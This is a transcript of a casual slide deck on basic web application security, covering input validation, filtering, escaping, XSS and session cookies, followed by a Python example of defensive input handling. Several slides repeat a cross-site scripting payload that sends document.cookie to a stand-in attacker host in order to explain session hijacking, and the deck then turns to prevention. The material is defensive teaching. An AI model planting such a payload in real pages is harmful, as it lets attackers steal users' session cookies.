
Basic Web Application Security



Presentation Transcript


  1. Basic Web Application Security

  2. User Input

  3. Kick Your Arse

  4. Three Ways (All Awesome)

  5. Validation

  6. Passive (No touchy-touchy)

  7. This is a Number. 2

  8. This is not a Number. a

  9. This is really not a Number. <script>alert('loldongs')</script>

  10. Filtering

  11. Destructive (One-Way Street)

  12. Only letting the good stuff in.

  13. or

  14. Keeping out the bad stuff.

  15. What’s the diff? (Bro.)

  16. Both can be error-prone...

  17. What happens when you screw it up? White-Listing → Usability Problems. Black-Listing → Security Problems. (Always a trade-off.)

  18. Escaping

  19. Transport: Point A → Point B

  20. Data will be the same on both sides.

  21. Different Media, Different Escaping

  22. HTML <b>Huh.</b> <p><i>&lt;b&gt;Huh.&lt;/b&gt;</i></p> <b>Huh</b>

  23. SQL: Sam O'Brien → INSERT INTO mah_peeps (name) VALUES ('Sam O\'Brien'); → 1, Sam O'Brien, 2010-09-02 18:30:00

  24. XSS (Cross-Site Scripting)

  25. SS (XTREME Site Scripting)

  26. Sticking Scripts Where They Don’t Belong. You there, down the back. Stop sniggering.

  27. <script>alert('HACKED BY LOLDONGS')</script> Amateurs!

  28. <script>alert(document.cookie)</script> Hmm.

  29. <script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Oh shit.

  30. Why is this uncool? (Yeah! Why?)

  31. <script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Ooooh shit.

  32. <script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Oooooooooooh shit.

  33. <script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Oooooooooooooooooh shit.

  34. Why is this really uncool? (Because shut up.)

  35. HTTP Hyper-Text Thingy I-forgot-again

  36. Stateless

  37. No Idea Who You Are.

  38. It can guess. (Badly.) IP Address, Browser User-Agent

  39. Sends a cookie with each request. (A basket of goodies that the browser sends faithfully every request.)

  40. The Server puts a unique ID in the basket. PHPSESSID=123your456mum789 __utma=12948.23.4211414.5553 is_a_furry=1

  41. Browser sends the ID every request. PHPSESSID=123your456mum789

  42. <script>document.write('<img src="http://badguys.net/logthis.php?d='+document.cookie+'" style="display:none;">');</script> Look again.

  43. THEY HAVE YOUR COOKIE. Ooooooooooooooooooooooo-

  44. Preventing Shenanigans

  45. HTML Validation Really Hard.

  46. HTML Filtering Still Really Hard. • Use a library, eg. HTML Purifier.

  47. HTML Escaping Dead Easy. Most languages have stuff to handle this, eg. htmlentities(), cgi.escape(), CGI.escape()

  48. How hard is filtering? (It’s just <script>, right?)
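The three approaches from slides 5 to 23 and 45 to 47 (validation, filtering, escaping), worked through on the slides' own inputs as an added example that is not part of the presentation. It assumes Python with the standard library only; the table name mah_peeps and the sample values are taken from the slides, and the white-list character set is an assumption chosen for illustration.

```python
import html
import re
import sqlite3


def is_number(value: str) -> bool:
    """Validation: passive. The input is only accepted or rejected, never changed."""
    return re.fullmatch(r"-?\d+", value) is not None


def filter_whitelist(value: str) -> str:
    """Filtering: destructive, one-way. Only letters, digits and spaces survive
    (assumed white-list); everything else, including quotes and angle brackets,
    is thrown away, which is why white-listing tends toward usability problems."""
    return re.sub(r"[^A-Za-z0-9 ]", "", value)


def escape_html(value: str) -> str:
    """Escaping for the HTML medium: the data is preserved and the browser
    displays it literally instead of interpreting it as markup."""
    return html.escape(value, quote=True)


def insert_and_read_back(name: str) -> str:
    """Escaping for the SQL medium: a parameterised query lets the driver do
    the quoting, so the value is the same on both sides of the transport.
    Uses an in-memory SQLite database constructed for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mah_peeps (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO mah_peeps (name) VALUES (?)", (name,))
    (stored,) = conn.execute("SELECT name FROM mah_peeps").fetchone()
    conn.close()
    return stored


if __name__ == "__main__":
    for sample in ("2", "a", "<script>alert('loldongs')</script>"):
        print(f"validate {sample!r}: {is_number(sample)}")
    print("filter  :", filter_whitelist("<script>alert('loldongs')</script>"))
    print("filter  :", filter_whitelist("Sam O'Brien"))  # apostrophe is lost
    print("html    :", escape_html("<b>Huh.</b>"))
    print("sql     :", insert_and_read_back("Sam O'Brien"))
```

Note that the filtered "Sam O'Brien" comes back without its apostrophe, while the escaped SQL round trip returns it intact; that is the difference between a one-way street and a transport.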
